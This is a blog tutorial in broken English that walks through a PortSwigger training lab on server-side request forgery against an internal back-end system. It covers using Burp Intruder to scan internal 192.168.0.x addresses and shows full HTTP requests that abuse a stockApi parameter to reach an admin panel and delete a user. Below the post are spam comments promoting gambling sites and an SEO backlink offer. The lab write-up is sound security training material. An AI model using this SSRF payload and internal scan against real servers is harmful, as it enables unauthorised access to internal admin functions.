SSRF Attack With Another Back-End System
Hello Cyberman!
How are u? I hope you fine.
This article subject ssrf another back-end system attack method.
What is SSRF if you don’t know, read this post. For click read article.
Now, We are this attack method maintain with different example.
This method name: Another back-end system. If you say how does this work, I telling. Above all, we must not forget: SSRF is server-side attack. In this scenario, server get it data from another server.
As above picture seen, in this scenario when client computer input web site, the server computer (ie IP address: 192.168.0.155) is showing the website to the client computer.
When the client computer requests another data, the computer with the ip number 192.168.0.155 requests the data from the other computer. (Other computer is ip address: 192.168.0.200)
These two computers are actually on the same network. And when we want to delete a data on the computer with the IP address 192.168.0.155, we need to find the data source because the source of the data is the computer numbered 192.168.0.200.
That scenario example is in Portswigger. Click for example lab. Then okay, so click button “Access the lab” for enter to lab. As below seen picture.
Press the “View Details” button on any stock on the screen that opens. When we click the “Check Stock” button to find out the amount of this stock in other branches, it gives us a number.
Now, think different. If this server is receiving data from another server, can I retrieve or modify other data from that the server? Answer is yes. We need a program for seen package in request/response. Its name, Burpsuite. I did mean before this article what is Burpsuite in this article.
Now we open burpsuite. And then when Intercept on open click “Check stock” button. Now, result response from server like as below seen picture.
And the “stockApi” parameter is in front of us. We are ip address change in parameter. Now, we adding “http://192.168.0.1:8080/admin” parameter of “stockApi”. As below seen picture.
A ip address give to number 0-255. There are many numbers between 0-255. It would not be right to try one by one. We use the wonderful feature in has Burp Suite, “Intruder”.
So, let’s send our package to the “Intruder” area with burpsuite. To do this, right click on the package and click “Send to Instruder”.
As seen in the picture above, Burp Suite will automatically try the green areas for us. Firstly, click “Clear” button for unselect all area. Then just select “1” in ip address area. And click button “Add $”
Then do settings payloads. As below seen picture like do it.
Then click button “Start attack” for attack. Okay, now front us attack screen open. And it’s try to number for us one by one. We need status number 200 in status area. As seen in the picture below. Drawn in yellow. The number 200 should be displayed in the status column.
I had to reboot due to Burp Suite connection problem. Therefore, I had the status code “200” at number “12”. Like as below seen picture.
Ok, now let’s manipulate the package with Burp Suite. I add “http://192.168.0.12:8080/admin” to “stockApi” parameter. Then I send the package by pressing the forward button.
Then click “delete” button for carlos delete. And look package in Burp Suite.
As below seen text result:
GET /http://192.168.0.12:8080/admin/delete?username=carlos HTTP/1.1
Host: 0a46007d04c3a019c0013fb300950017.web-security-academy.net
Cookie: session=JhMrhAIxOT1zjGN9ad7CNZNgxhkEe8Mj
Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a46007d04c3a019c0013fb300950017.web-security-academy.net/product?productId=2
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: closeOkay now, we are take it GET method. And we editing like below text:
POST /product/stock HTTP/1.1
Host: 0a46007d04c3a019c0013fb300950017.web-security-academy.net
Cookie: session=JhMrhAIxOT1zjGN9ad7CNZNgxhkEe8Mj
Content-Length: 96
Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://0a46007d04c3a019c0013fb300950017.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a46007d04c3a019c0013fb300950017.web-security-academy.net/product?productId=2
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
stockApi=http://192.168.0.12:8080/admin/delete?username=carlosThen we send the package via Burp Suite.
And finally!.. First get it admin panel then deleted carlos…
Have a nice day with lots of informatics 🙂
May I simply just say what a comfort to uncover an individual who actually knows what they are talking about on the internet. You definitely realize how to bring an issue to light and make it important. More and more people have to look at this and understand this side of your story. Its surprising you arent more popular because you surely possess the gift.
Thank you 🙂
Great article! This is the type of info that are supposed to be shared across the internet.
Shame on the seek engines for no longer positioning this publish upper!
Come on over and consult with my web site .
Thanks =)
I may need your help. I tried many ways but couldn’t solve it, but after reading your article, I think you have a way to help me. I’m looking forward for your reply. Thanks.
Itís difficult to find experienced people for this topic, but you seem like you know what youíre talking about! Thanks
Hi, i think that i saw you visited my site thus i
came to “return the favor”.I am trying to find things to enhance my web
site!I suppose its ok to use a few of your ideas!!
Have you ever considered creating an e-book or guest authoring on other
websites? I have a blog centered on the same ideas you discuss and would really like to have you share some stories/information.
I know my readers would enjoy your work. If you are even remotely interested, feel free to send me an e mail.
My webpage … 소액결제현금화
Hey there, You’ve done a fantastic job. I’ll certainly digg it
and personally suggest to my friends. I am confident they will be benefited from this website.
My homepage; 사설토토
I do not even know how I ended up here, but I thought this post was good.
I do not know who you are but definitely you are going to a famous blogger if
you aren’t already 😉 Cheers!
My web blog; 슬롯사이트
You’ve made some really good points there. I checked on the web for more info
about the issue and found most individuals will go along with
your views on this site.
my webpage – 신용카드현금화
This design is incredible! You certainly know
how to keep a reader entertained. Between your wit and your videos,
I was almost moved to start my own blog (well, almost…HaHa!) Great job.
I really loved what you had to say, and more than that, how you presented it.
Too cool!
Feel free to visit my website … 먹튀검증
With havin so much content and articles do you ever run into any problems of plagorism
or copyright infringement? My website has a lot of completely
unique content I’ve either authored myself or
outsourced but it appears a lot of it is popping it up all
over the internet without my authorization. Do you
know any techniques to help prevent content from being stolen?
I’d really appreciate it.
Also visit my blog post :: 바카라사이트
When I originally commented I appear to have clicked the -Notify me when new comments are added- checkbox and from now on every time a comment is added I receive four emails with the same comment. There has to be a way you can remove me from that service? Many thanks!
Hmm, ok! I think how to solve this problem.
I used to be able to find good information from your blog posts.
my blog post … 카지노사이트
When I initially commented I clicked the “Notify me when new comments are added”
checkbox and now each time a comment is added I get several
e-mails with the same comment. Is there any way you can remove me from that service?
Thanks!
Feel free to visit my web blog; 슬롯사이트
I got this site from my buddy who informed me on the topic of this
site and at the moment this time I am visiting this site and reading very informative
posts at this time.
Take a look at my homepage – 먹튀검증
This page definitely has all the info I needed about
this subject and didn’t know who to ask.
Also visit my blog post :: 먹튀검증
Thx! 🙂
Heya just wanted to give you a brief heads up and let you
know a few of the pictures aren’t loading correctly.
I’m not sure why but I think its a linking issue. I’ve
tried it in two different internet browsers and both show the same results.
Also visit my website: 토토사이트
Thank you, I will review for this problem. 🙂
Dear Website Owner,
I hope this email finds you well. I recently discovered your website and was impressed by the quality of your content and the helpful information you offer to your audience. In light of this, I would like to propose a backlink exchange that could benefit both our websites.
My website, https://m.cheapestdigitalbooks.com/, is focused on providing affordable digital books to readers around the world. We currently have a strong online presence with a Domain Authority (DA) of 13, a Page Authority (PA) of 52, and a Domain Rating (DR) of 78. Our website features 252K backlinks, with 95% of them being dofollow, and has established connections with 5.3K linking websites, with 23% of these being dofollow links.
I believe that a mutually beneficial backlink exchange could be of great value for both of our websites, as it may lead to an increase in website authority and improve our search engine rankings. In this collaboration, I am willing to add backlinks from my website using your desired keywords and anchor texts. In return, I would be grateful if you could include backlinks with my desired keywords and anchor texts on your website.
I kindly request that you visit my website, https://m.cheapestdigitalbooks.com/, to get a sense of the potential benefits this partnership could bring to your site. I am confident that this collaboration will provide a win-win situation for both parties, and I look forward to learning more about your thoughts on this proposal.
Thank you for considering my offer. I am excited about the potential growth this partnership may bring to our websites and am eager to discuss the details further. Please do not hesitate to reach out to me at your convenience.
Best regards,
David E. Smith
Email: david@cheapestdigitalbooks.com
Address: 3367 Hood Avenue, San Diego, CA 92117
In my opinion you are not right. I am assured. Let’s discuss. Write to me in PM, we will communicate.
I hope, you will find the correct decision.